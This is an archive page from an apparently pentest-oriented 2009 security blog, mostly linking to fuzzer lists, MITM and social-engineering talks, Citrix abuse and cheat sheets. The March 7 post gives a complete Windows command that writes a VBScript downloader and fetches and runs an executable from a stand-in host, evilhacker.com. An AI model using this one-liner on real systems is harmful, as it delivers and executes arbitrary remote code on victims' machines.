Saturday, March 14, 2009
The "Ultimate" list of Fuzzers
Doesn't seem very "Ultimate" but its a good list:
http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html
Active Man in the Middle Attack
A presentation by Adi Sharabani from IBM on MITM:
http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html

http://blog.watchfire.com/wfblog/2009/02/active-man-in-the-middle-attacks.html
Friday, March 13, 2009
Social Engineering Webcast
Chris Nickerson and Mike Murray put on a good webinar about Social Engineering. Check out the recording and slide deck here:
http://www.ethicalhacker.net/content/view/242/2/

http://www.ethicalhacker.net/content/view/242/2/
Wednesday, March 11, 2009
Shell Greed
On twitter I post a long shell command that would boot/kick off a system every other user. @marcinw made it shorter and I submitted it to Shell-fu.org. Today they posted it live. Here is the link:
http://www.shell-fu.org/lister.php?id=558

http://www.shell-fu.org/lister.php?id=558
Tuesday, March 10, 2009
HTML to PDF
The site just just as it says. Has a ton of applications, but the one I'm interested in at the moment, is using to to throw things on my Kindle for later reading.
http://www.html-pdf-converter.com/

http://www.html-pdf-converter.com/
Abusing Citrix - Part 1
An old hack that still works. Awesome:
http://synjunkie.blogspot.com/2009/03/abusing-citrix-part-1.html

http://synjunkie.blogspot.com/2009/03/abusing-citrix-part-1.html
Monday, March 9, 2009
Saturday, March 7, 2009
One LONG line wget for windows
"cmd.exe /c echo Const adTypeBinary = 1 > C:\windows\getnrun.vbs & echo Const adSaveCreateOverWrite = 2 >> C:\windows\getnrun.vbs & echo Dim BinaryStream >> C:\windows\getnrun.vbs & echo Set BinaryStream = CreateObject("ADODB.Stream") >> C:\windows\getnrun.vbs & echo BinaryStream.Type = adTypeBinary >> C:\windows\getnrun.vbs & echo BinaryStream.Open >> C:\windows\getnrun.vbs & echo BinaryStream.Write BinaryGetURL(Wscript.Arguments(0)) >> C:\windows\getnrun.vbs & echo BinaryStream.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> C:\windows\getnrun.vbs & echo Function BinaryGetURL(URL) >> C:\windows\getnrun.vbs & echo Dim Http >> C:\windows\getnrun.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> C:\windows\getnrun.vbs & echo Http.Open "GET", URL, False >> C:\windows\getnrun.vbs & echo Http.Send >> C:\windows\getnrun.vbs & echo BinaryGetURL = Http.ResponseBody >> C:\windows\getnrun.vbs & echo End Function >> C:\windows\getnrun.vbs & echo Set shell = CreateObject("WScript.Shell") >> C:\windows\getnrun.vbs & echo shell.Run "C:\update.exe" >> C:\windows\getnrun.vbs & start C:\windows\getnrun.vbs http://evilhacker.com/update.exe C:\update.exe"

Friday, March 6, 2009
Fact/Fiction Book by Jayson Street
Check out the site for some sneak peeks into the Fact/Fiction book coming out BH USA / DefCon timeframe!
The Story is F1ct10n The threats are real.

The Story is F1ct10n The threats are real.
Thursday, March 5, 2009
Developer Cheet Sheets galore
A bunch of programming cheet sheets. Why post it here? Because those SQL, BATCH, and Bash cheet sheets come in mighty handy during pentests:
http://www.fuzzyopinions.com/article/technology/the-developer-cheat-sheet-compilation

http://www.fuzzyopinions.com/article/technology/the-developer-cheat-sheet-compilation
Flash and Javascript Evaluater
This a pretty awesome service, still in alpha so play nice:
http://wepawet.iseclab.org/index.php
They have examples that you can check out if you don't have anything on hand to throw at it.

http://wepawet.iseclab.org/index.php
They have examples that you can check out if you don't have anything on hand to throw at it.
Subscribe to:
Posts (Atom)